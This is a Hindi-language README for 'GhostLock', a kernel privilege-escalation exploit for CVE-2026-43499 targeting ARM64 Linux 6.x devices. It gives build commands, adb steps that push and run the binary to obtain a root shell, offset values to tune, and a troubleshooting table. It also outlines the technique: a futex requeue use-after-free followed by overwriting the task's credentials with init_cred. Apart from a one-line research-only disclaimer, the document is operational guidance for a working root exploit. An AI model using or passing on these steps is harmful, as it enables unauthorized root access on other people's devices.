
गैर-Android Linux 6.x ARM64 के लिए GhostLock (CVE-2026-43499) अनुकूलन
गैर-Android Linux 6.x ARM64 कर्नेल के लिए GhostLock (CVE-2026-43499) विशेषाधिकार वृद्धि शोषण।
| आइटम | मान |
|---|---|
| आर्किटेक्चर | ARM64 (AArch64) |
| VA_BITS | 39 |
| KIMAGE_TEXT_BASE | 0xffffffc008000000 |
| कर्नेल संस्करण | 6.x |
| SELinux | नहीं |
| ashmem | नहीं |
| configfs | नहीं |
make
make android-arm64 NDK=/path/to/android-ndk
पुश करने पर स्वचालित रूप से संकलन ट्रिगर होता है, बस आर्टिफैक्ट डाउनलोड करें।
# लक्ष्य डिवाइस पर पुश करें
adb push ghostlock-arm64 /data/local/tmp/e
adb shell chmod 755 /data/local/tmp/e
# रूट शेल प्राप्त करें
adb shell /data/local/tmp/e --shell
# pselect ऑफसेट समायोजित करें (यदि डिफ़ॉल्ट मान काम नहीं करता है)
adb shell PSELECT_SHIFT=-4 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=-2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=0 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=4 /data/local/tmp/e --shell
# भौतिक लोड पता निर्दिष्ट करें
adb shell KPHYS=0x80000000 /data/local/tmp/e --shell
FUTEX_CMP_REQUEUE_PI remove_waiter() का UAF ट्रिगर करता हैrt_mutex_waiter stack_fds बफर में आता हैtask_struct->cred को init_cred से ओवरराइट करेंयह संस्करण ghostlock-oneplus पर आधारित सरलीकृत है:
यह उपकरण केवल सुरक्षा अनुसंधान के लिए है। उपयोगकर्ता को सभी जिम्मेदारी स्वयं वहन करनी होगी।
| चर | डिफ़ॉल्ट मान | विवरण |
|---|
PSELECT_SHIFT | -2 | स्टैक पर pselect waiter का ऑफसेट समायोजन |
KPHYS | 0x80000000 | कर्नेल भौतिक लोड पता |
KIMAGE_TEXT_BASE | 0xffffffc008000000 | कर्नेल वर्चुअल आधार पता |
| लक्षण | संभावित कारण | समाधान |
|---|
| डिवाइस रीबूट | PSELECT_SHIFT गलत | -4 से +4 तक एक-एक करके आज़माएँ |
| कोई प्रभाव नहीं | KPHYS गलत | /proc/iomem में सही मान की पुष्टि करें |
| perf_event_open failed | seccomp प्रतिबंध | ADB शेल के माध्यम से चलाने का प्रयास करें |
| रूट नहीं मिला | ऑफसेट मेल नहीं खाते | कर्नेल संस्करण की पुष्टि करें, TASK_CRED_OFF जाँचें |